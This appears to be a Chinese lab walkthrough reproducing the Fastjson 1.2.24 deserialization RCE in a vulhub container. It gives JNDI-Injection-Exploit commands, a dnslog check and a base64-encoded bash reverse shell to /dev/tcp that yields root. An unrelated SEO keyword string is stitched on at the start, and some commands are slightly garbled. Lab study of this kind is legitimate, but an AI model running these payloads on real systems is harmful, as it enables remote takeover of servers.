青海建筑网站建设公司,注册德国网站域名,重庆永川网站建设报价,驻马店广告制作公司文章目录 启动环境漏洞复现下载bp插件漏洞扫描dnslog测试是否向外请求资源用工具构造rmi服务器 反弹shell 启动环境 到vulhub目录下 cd vulhub/fastjson/1.2.24-rce安装环境并启动#xff1a; sudo docker-compose up -d sudo docker-compose up -d启动成功 sudo docker-compose up -d sudo docker-compose up -d启动成功如图 查看端口发现是8090打开bp内置浏览器输入10.9.75.45:8090打开环境 漏洞复现 FastJson 是Alibab的一款开源Json 解析库可用于将Java 对象转换为其Json 表示形式也可以用于将Json 字符串转换为等效的Java 对象。近几年来FastJson 漏洞层出不穷。RCE 漏洞的源头:17年FastJson 爆出的1.2.24 反序列化漏洞。 关于FasiJson 1.2.24 反序列化漏洞简单来说就是FastJson 通过parsebiect/parse 将传入的字符由反广列化为Java 对象时由于没有进行合理检查而导致的。 打开环境后用bp抓包Ctrlr发送到repeater模块右键改为post方法将content-type字段改为application/json然后添加一个json格式的数据并提交 {name:EMT,age:24}上传成功 这个过程中json- object - json进行了序列化和反序列化 下载bp插件 到网站Releases · Maskhe/FastjsonScan (github.com)复制FastjsonScan.jar包的地址 在kali中到下面目录 cd tools/burpsuite/extensions新建一个目录 mkdir Fastjosnscan到新建的目录下输入命令拉取FastjsonScan.jar包 proxychains wget https://github.com/Maskhe/FastjsonScan/releases/download/1.0/FastjsonScan.jar在bp中选择extensions点击add添加插件 安装插件已完成 漏洞扫描 来到repeater模块将数据包发送到FastjsonScan 发送后等待扫描结束后发现漏洞得到漏洞利用的poc poc中有rmi它相当于Java的http协议通过它可以远程执行引用一个外部类。 dnslog测试是否向外请求资源 生成一个URL 用lbap测试是否有URL跳转 测试成功。有URL跳转向外部请求资源 用工具构造rmi服务器 cd tools新建一个文件夹JNDI-Injection-Exploit进入该目录输入命令下载工具 sudo wget https://github.com/welk1n/JNDI-Injection-Exploit/releases/download/v1.0/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar下载完成后在该目录下执行命令 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C touch /tmp/EMT -A 10.9.75.45成功构建出服务器显示出URL 用生成的URL到数据包中提交如果成功就可以在容器的tmp目录下创建一个EMT文件点击send后报错返回号500 用命令查看容器ID sudo docker ps -a如图 登录容器 sudo docker exec -it 26ad /bin/bash如图登录成功 查看tmp目录下的文件写入文件成功 反弹shell 用上面的漏洞可以写一个反弹shell命令来获取对方的shell 反弹shell命令,端口设为1234 bash -i /dev/tcp/10.9.75.45/1234 01进行base64编码 YmFzaCAtaSAJiAvZGV2L3RjcC8xMC45Ljc1LjQ1LzEyMzQgMD4mMQ将base64编码组成下面命令 bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xMC45Ljc1LjQ1LzEyMzQgMD4mMQ}|{base64,-d}|{bash,-i}同上用工具构造一个可以发送的url java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xMC45Ljc1LjQ1LzEyMzQgMD4mMQ}|{base64,-d}|{bash,-i} -A 10.9.75.45如图构造成功 监听1234端口 复制一条URL到数据包中点击发送 反弹shell成功获取到root权限